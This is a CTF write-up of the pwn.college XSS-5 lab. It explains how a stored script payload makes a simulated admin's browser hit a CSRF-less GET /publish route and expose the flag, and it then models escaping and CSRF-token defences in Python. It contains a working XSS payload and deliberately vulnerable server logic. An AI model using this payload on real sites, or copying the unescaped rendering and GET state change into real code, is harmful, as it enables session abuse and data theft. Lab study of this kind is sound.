XSS-5

Challenge overview

The /challenge directory holds two programs. The server script starts a web service that simulates a forum with login, post publishing and draft-saving features; the victim script simulates a victim who visits the forum page. If the XSS injection succeeds, you get the flag.

Vulnerability analysis

First, the relevant part of the server-side source:

```python
# The flag is seeded as admin's only post, stored as an unpublished draft.
db.execute("""CREATE TABLE posts AS SELECT ? AS content, "admin" AS author, FALSE AS published""", [flag])

@app.route("/publish", methods=["GET"])
def challenge_publish():
    if "username" not in flask.session:
        flask.abort(403, "Log in first!")

    # https://www.sqlite.org/lang_update.html
    # A plain GET publishes every draft owned by the logged-in user: no confirmation, no CSRF token.
    db.execute("UPDATE posts SET published = TRUE WHERE author = ?", [flask.session.get("username")])
    return flask.redirect("/")
```

From this code block, the post under the admin account is exactly the flag we need, but it starts out as a draft, and a draft only displays its first 12 characters. So we need to find a way to make admin publish their own post.

Also note that as soon as a user visits the /publish route, every draft under their name is published, with no second confirmation: a state-changing GET with no CSRF protection. So the goal is to get admin to visit a page with our injected content, and the victim code does exactly that:

```python
from selenium.webdriver.common.by import By

# `browser` is the Selenium WebDriver instance the victim script creates earlier.
challenge_url = "http://challenge.localhost:80/"

print(f"Visiting {challenge_url}")
browser.get(challenge_url)

# The victim logs in as admin, using the flag itself as the password.
browser.find_element(By.NAME, "username").send_keys("admin")
browser.find_element(By.NAME, "password").send_keys(open("/flag").read().strip())
browser.find_element(By.NAME, "submit").submit()
```

This script is precisely the simulated admin login we need: once admin is logged in and viewing the forum, any JavaScript we manage to inject into a post runs with admin's session, so we can use it to make admin's browser publish the post.

Exploitation

Since the guest user's password is known, first log in as guest and publish a post containing the following malicious JavaScript:

```html
<script>fetch("http://challenge.localhost/publish")</script>
```

Then run the victim script and refresh the page; the flag is now visible in admin's published post. The fetch() targets the same origin the forum page is served from (challenge.localhost), so admin's session cookie is attached automatically and no CORS preflight gets in the way. Because /publish accepts GET, any tag that loads a resource (an `<img src="/publish">`, for instance) would trigger it just as well.
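To make the two defects concrete, here is an added example that is not part of the original write-up or of the pwn.college challenge code. It models the forum's rendering and publish handler in plain Python (no Flask, so it runs offline): `render_post_vulnerable` inlines post content the way an unescaped template does, `render_post_escaped` entity-encodes it, `publish_vulnerable` mirrors the GET route shown above, and the hypothetical `publish_hardened` / `issue_csrf_token` pair requires POST plus a per-session CSRF token. The posts list and flag value are constructed sample data.

```python
import html
import hmac
import secrets


def fresh_posts():
    """Constructed stand-in for the challenge's posts table; the flag value is made up."""
    return [
        {"content": "pwn.college{made_up_flag}", "author": "admin", "published": False},
        {"content": "hello from guest", "author": "guest", "published": True},
    ]


# The payload from the write-up, as it would be stored in a guest post.
PAYLOAD = '<script>fetch("http://challenge.localhost/publish")</script>'


def render_post_vulnerable(content: str) -> str:
    """Model of a template that inlines post content verbatim: stored XSS."""
    return f"<div class='post'>{content}</div>"


def render_post_escaped(content: str) -> str:
    """Same template with HTML entity encoding: the browser shows text, it never parses a tag."""
    return f"<div class='post'>{html.escape(content, quote=True)}</div>"


def contains_script_tag(rendered: str) -> bool:
    return "<script" in rendered.lower()


def publish_vulnerable(session: dict, method: str, posts: list) -> int:
    """Model of the route shown above: any authenticated request, GET included, publishes all drafts."""
    if "username" not in session:
        return 403
    for post in posts:
        if post["author"] == session["username"]:
            post["published"] = True
    return 302  # redirect to "/"


def issue_csrf_token(session: dict) -> str:
    """Hypothetical helper: mint a per-session token the publish form must echo back."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def publish_hardened(session: dict, method: str, form: dict, posts: list) -> int:
    """Hypothetical hardened route: POST only, and the form must carry the session's CSRF token."""
    if "username" not in session:
        return 403
    if method != "POST":
        return 405  # a GET (fetch(), <img src>, link prefetch) can no longer change state
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return 403
    for post in posts:
        if post["author"] == session["username"]:
            post["published"] = True
    return 302
```

The POST-plus-token check defeats the one-line payload above, but it is not a fix for the XSS itself: script already running in admin's origin can fetch `/`, read the token out of the form and submit it. SameSite cookies do not help here either, since the request is same-origin. The change that actually closes the hole is the entity encoding in `render_post_escaped`; the CSRF check is defence in depth for the day another injection slips through.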


http://0x4a-210.github.io/2025/07/15/pwn.college/Intro-to-Cybersecurity/Web/XSS-5/
Posted on July 15, 2025